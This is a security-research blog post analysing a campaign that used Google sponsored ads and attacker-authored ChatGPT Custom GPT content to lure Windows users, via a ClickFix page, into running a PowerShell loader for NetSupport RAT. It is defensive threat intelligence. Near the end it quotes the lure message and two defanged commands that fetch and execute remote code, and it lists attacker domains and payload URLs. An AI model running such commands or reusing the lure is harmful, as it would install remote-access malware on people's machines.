20
 min read
October 1, 2026
|
Updated: 

How Attackers Use Sponsored Search & Custom GPT’s in Malware Delivery

Security Research

How Google-sponsored results routed people through attacker-authored ChatGPT content to a ClickFix lure and a Windows remote-access payload, and how Island’s AI Investigator connected the first lead.

Executive Summary

Attackers abused users’ trust in sponsored search and ChatGPT by purchasing ads that appeared for searches such as “chatgpt.” The ads led to legitimate chatgpt.com routes containing attacker-authored Custom GPT or shared-chat content. In the confirmed cases, unrelated prompts received the same fake service warning, directing people to a “backup domain.”

The lure domain redirected to a fake ChatGPT and Cloudflare verification page that used ClickFix instructions. Those instructions were designed to make Windows execute a PowerShell command that retrieved a malicious loader. Isolated analysis of that loader identified behavior consistent with NetSupport RAT delivery. Other observed branches used separate MSI and WebDAV-based delivery paths and should not be read as additional stages of the same execution chain.

Island’s AI Investigator surfaced suspicious activity and connected relevant evidence across AI interaction and browser telemetry. Security Research then validated the external infrastructure and payload behavior. Across a three-month observation period ending in August 2026, the broader delivery cluster included about 850 paid-ad landings, 26 lookalike ChatGPT destinations, and 71 Google Ads campaign IDs. Only a small subset of the destinations was confirmed to serve this exact lure, and these figures do not represent malware executions or infections.

The campaign did not require a vulnerability in ChatGPT or Google. It abused trusted platforms, attacker-authored content, paid search, and social engineering to move people toward malware delivery. The discovery underscores the necessity of Island’s AI Investigator - an agent designed to bridge AI interaction telemetry with browser and endpoint context to surface anomalous activity traditional controls often overlook.

The Suspicious Sentence

Buried in an organization’s AI activity, several unrelated ChatGPT conversations ended the same way. The prompts covered ordinary, unrelated tasks, yet each conversation received the exact same reply:

The first meaningful signal was not a malware file, a known-bad domain, or a policy violation. It was a sentence that did not belong. The domain was newly registered and appeared inside a legitimate ChatGPT session, leaving conventional reputation and policy controls with little context to evaluate the destination.

What we found

Across several Custom GPT destinations, unrelated conversations returned the same fake “backup domain” response. From late May through August 24, 2026, our research mapped about 850 paid-ad landings across 26 lookalike ChatGPT destinations and 71 Google Ads campaign IDs. 

Our infrastructure analysis identified a later web cluster of five ChatGPT-themed landing or redirect domains, an abused Google Sites page, and a separate controller domain, linked by distinctive controller and request behavior. Only a small subset of the ChatGPT destinations was confirmed to have served this exact lure. These findings describe the broader delivery cluster and its infrastructure, not malware executions or infections.

That activity became the starting point for an investigation spanning AI interactions, browser navigations, advertising attribution, infrastructure, and endpoint payload behavior.

Reconstructing the attack

The evidence resolved into a sequence that began on a paid-search result and ended at a remote-access payload.

1. The identical sentence

Island’s AI Investigator, an agent that examines AI interactions for security-relevant patterns traditional rules might miss, surfaced suspicious activity across several unrelated conversations:

⚠️ We are experiencing high traffic now. Continue on our backup domain: hxxps://openai-backup[.]one [defanged]

The response appeared verbatim across conversations from two distinct custom GPT destinations over three days, regardless of the request. Both destinations used names resembling “ChatGPT Plus,” and the lure domain appeared in assistant output rather than in the users’ prompts. Together, those facts support a repeatable, controlled response path. We did not inspect the GPT configurations, so we cannot say where or how the response was configured.

Figure 1: Unrelated prompts, one identical response, from two lookalike Custom GPT destinations.

2. Google-sponsored delivery into attacker-authored ChatGPT content

Our AI Investigator reconstructed the activity leading up to each affected conversation. The surrounding activity was routine, and the last recorded referrer was google.com. Each observed entry into the lookalike ChatGPT destination came from google.com through a server redirect, and the landing URLs carried multiple Google Ads attribution parameters:

https://chatgpt.com/g/g-6a762cc4[…]-plus-5-6
?gad_source=1              <- Google ad-source indicator
&gad_campaignid=2409[…]    <- Google Ads campaign identifier
&gbraid=0AAAABEY[…]        <- privacy-preserving aggregate attribution identifier
&gclid=CjwKCAjws[…]        <- Google click identifier

Taken together, the Google referrer, server redirect, gclid, gbraid, gad_source, and gad_campaignid values corroborated paid-ad delivery in the observed sessions. The recurring campaign identifier linked related landings, but none of these fields alone identifies an advertiser or proves that every URL carrying one came from the same campaign. This interpretation is consistent with Google’s advertising-parameter documentation: https://support.google.com/analytics/answer/16479993

One question remained: what had they clicked?

The navigation records immediately before the redirects showed searches for the ordinary term “chatgpt.”

The result was a trust funnel: sponsored search results routed people into legitimate chatgpt.com pages whose creator-authored content promoted attacker-controlled infrastructure.

3. From the backup domain to ClickFix and NetSupport

The Investigator surfaced and correlated the in-product and browser evidence. The openai-backup[.]one domain redirected to a Google Sites page impersonating ChatGPT and Cloudflare. The page displayed a fake “Human Verification” prompt instructing visitors to press Win+R, paste clipboard content, and press Enter. This is the ClickFix technique, a social engineering method widely observed since early 2024 that tricks people into executing malicious commands on their own devices.

Figure 2: The counterfeit Cloudflare verification page instructed visitors to open Windows Run and execute clipboard content.

The ClickFix command retrieved a heavily obfuscated PowerShell loader from fixconfig[.]app. Isolated analysis observed dynamic .NET compilation, persistence-related behavior, code injection, Telegram Bot API communication, and behavior consistent with NetSupport RAT. The reconstructed chain was:

Figure 3: The observed path from a paid Google result through attacker-authored ChatGPT content, openai-backup[.]one, a counterfeit verification page, and the PowerShell loader.

4. Campaign breadth

~850
Paid-ad landings
26
Lookalike ChatGPT destinations
71
Google Ads campaign IDs

The confirmed lure sat within a broader, sustained delivery cluster spanning paid-ad landings, lookalike Custom GPT and shared-chat destinations, and multiple Google Ads campaign IDs. Only a small subset of those destinations is confirmed to have served this exact “backup domain” lure, so the broader measurements describe delivery activity, not malware execution or infection.

5. The infrastructure kept rotating

Our research observed the same fake “backup domain” lure directing people to both safepage-gpt[.]com and openai-backup[.]one. In a later live capture, the same ClickFix flow had rotated its PowerShell loader endpoint from fixconfig[.]app to brmconfig[.]com. The later branch retrieved a structurally valid but unplayable MP4, consistent with an encrypted carrier used in a PowerShell-to-NetSupport RAT delivery chain. We also connected the campaign to two other Windows payload-delivery paths: a PowerShell and MSI path involving psmoeromanilo[.]com, and a WebDAV and msiexec path involving 65.21.80[.]170. Together, these findings show rotation across lure domains, loader infrastructure, payload packaging, and delivery methods. Evidence of delivery does not by itself establish malware execution or infection.

Between July 26 and August 20, 2026, our infrastructure analysis identified a seven-artifact web cluster: five ChatGPT-themed landing or redirect domains, the abused Google Sites page, and a separate controller domain. In addition to openai-backup[.]one, the rotating ChatGPT-themed infrastructure included chatgpt-safepage[.]com, gpt-backup[.]com, backup-gpt[.]com, and gpt-backup[.]top. The four additional domains loaded the same controller script found on the Google Sites lure, fafaplaplapla[.]com/embed/0395374ca234d04b.js, and generated matching API and panel-event requests. These distinctive connections linked the rotating domains to the same campaign infrastructure.

A differently themed domain, defi-xstocks[.]vip, shared the same technical markers but lacked a confirmed connection to the ChatGPT lure. We therefore classified it as probable broader infrastructure and excluded it from the confirmed ChatGPT campaign findings. These observations measure infrastructure identified during the investigation, not people, clicks, malware executions, or infections.

A known technique, distinct infrastructure

Huntress previously documented a related AI and search-poisoning technique in which ordinary searches led people to attacker-authored ChatGPT and Grok conversations that instructed them to run commands delivering AMOS. Our findings fit the broader pattern of weaponizing trusted AI-hosted content, but the activity we observed used sponsored search, repeatable Custom GPT lure responses, an external “backup domain” redirect, ClickFix, and a Windows payload. We found no evidence linking the operators and we make no attribution claim.

The sentence was the clue. The full story emerged only when it was connected to paid-search delivery, rotating infrastructure, and payload behavior. Throughout the investigation, we treated exposure, confirmed lure delivery, and malware execution as separate questions, because evidence of one does not prove the next.

Why use an Agent?

For a human analyst, relying on static rules or searches to flag suspicious activity, the attack we described above would be a hard needle to find in the haystack of AI events. This is because security research today faces two issues that the old threathunting landscape didn’t have to face:

  1. The Problem of Unstructured Data. Critical information in the world of AI interactions is not what traditional security data looks like. It’s unstructured, natural language prompts and responses given during an AI interaction. The words make up the intent of the actor. This data cannot be adequately analyzed using the tools researchers once used like SQL, regexes or static scripts.
  1. Event Correlation and Drawing Conclusions in Scale. Making the connections needed to find anomalies in AI events can sometimes be much more complicated than a logical join. For any multi-step event timeline investigation, someone must connect the dots, draw conclusions, and think of the next question that should be asked to advance the search. When having to perform such analysis on mountains of data, where critical information can be hidden between many lines of text, manual querying and triaging is not effective enough.

To address these two challenges, we built and trained an agent to investigate AI interactions. However, we know from experience that allowing an agent to read the raw data without additional context is not sufficient.

The agent has to be taught how to handle the data deliberately, through a semantic layer, as we described in our previous blog, Scaling Meaning: The Case for a Semantic Layer in the AI Era.

A semantic layer works to bridge the gap between business intelligence and raw data. It enables you to turn raw audit events into defined behaviors and actions an agent can reason over. Connecting the agent to the data in this way allowed it to flag AI interaction anomalies, analyze browser and advertising context, and trace related activity across lookalike ChatGPT destinations.

The AI Investigator surfaced and correlated the evidence. Security Research then challenged its conclusions and independently validated the external infrastructure and payload behavior in an isolated environment. This combination accelerated the investigation while preserving human validation for the most consequential findings. 

Agents for breadth, researchers for judgment

Agents can examine more conversations and events than a person, but scale does not turn correlation into proof. Before a finding informs publication or response, Security Research reviews the underlying evidence, tests alternative explanations, and determines what the data supports and what it does not.

The review also strengthens future investigations. Validated steps become reusable methods, and discrepancies are used to refine the semantic views and agent instructions, improving the Investigator over time.

Turning the chain into controls

This campaign crossed several trust boundaries without evidence that it exploited a vulnerability in ChatGPT. The journey began with a sponsored search result, continued through attacker-authored content on legitimate ChatGPT routes, redirected users off-platform, used clipboard-assisted Win+R instructions, and ended in observable endpoint behavior.

No single signal reveals the entire attack. AI interactions take place across browser chats, desktop applications, and AI gateways, accessed from corporate devices, personal computers, and smartphones across many types of networks. Island’s connected browser, endpoint, network, and AI control points bring those signals together. They allow defenders to correlate AI interaction telemetry with paid-search indicators and redirects, detect suspicious clipboard-to-Run behavior, block confirmed infrastructure, and investigate any subsequent endpoint activity as one traceable chain.

The investigation began with a sentence that looked harmless in isolation. The broader campaign became visible only when conversation meaning, browser context, advertising attribution, infrastructure, and endpoint behavior were analyzed as one chain, demonstrating why connected visibility across AI platforms is essential to effective security and governance.

Indicators of compromise:

We classify infrastructure as confirmed when it is directly linked to an observed lure, redirect chain, controller, loader, or payload. We classify it as probable when multiple distinctive technical relationships connect it to confirmed infrastructure, but no direct campaign-specific link has been recovered. The confirmed controller-linked web cluster was observed from July 26 through August 24, 2026. The probable predecessor cluster was observed from May 24 through July 17, 2026. These dates represent observations in the reviewed infrastructure records, not verified campaign start or end dates.

Confirmed campaign and payload infrastructure

  • openai-backup[.]one
  • safepage-gpt[.]com
  • chatgpt-safepage[.]com
  • gpt-backup[.]com
  • backup-gpt[.]com
  • gpt-backup[.]top
  • sites.google[.]com/view/antibot-837116/chatgpt
  • fafaplaplapla[.]com/embed/0395374ca234d04b.js
  • fixconfig[.]app
  • laborado[.]net
  • 176.65.144[.]122/fakeurl.htm
  • psmoeromanilo[.]com
  • 65.21.80[.]170/webdav/Installer_3c36ff.msi
  • brmconfig[.]com
  • brmconfig[.]com/video.mp4

Probable related infrastructure

  • chatgpt-web[.]vip
  • chatgpt-backup[.]com
  • backup-chatgpt[.]com
  • gpt-safepage[.]com
  • backup-openai[.]com
  • defi-xstocks[.]vip

Observed ClickFix commands, defanged

powershell -c "iex(irm fixconfig[.]app)"
powershell -C "IEX(irm 'brmconfig[.]com')"; exit

These indicators span multiple observed delivery branches and should not be interpreted as stages of a single execution chain.

Shachar Gritzman

Shachar is a Senior Security Researcher at Island, focused on staying one step ahead of threat actors through proactive security research and threat hunting. With over 10 years of experience across reverse engineering, malware analysis, threat detection, and cloud security, Shachar drives offensive and defensive research to anticipate and outpace emerging threats. His work uncovering threat campaigns and building high-fidelity defenses has directly shaped Island's security practices and raised the bar for browser security.

Naveh Talmon Chvaicer

Naveh Talmon Chvaicer is a Data & AI Researcher at Island, where he delivers data-driven insights and constructs AI solutions for customers and internal teams. With a focus on agent implementation and AI-based classification projects, he works on the development of autonomous AI Research agents and self-improving application frameworks.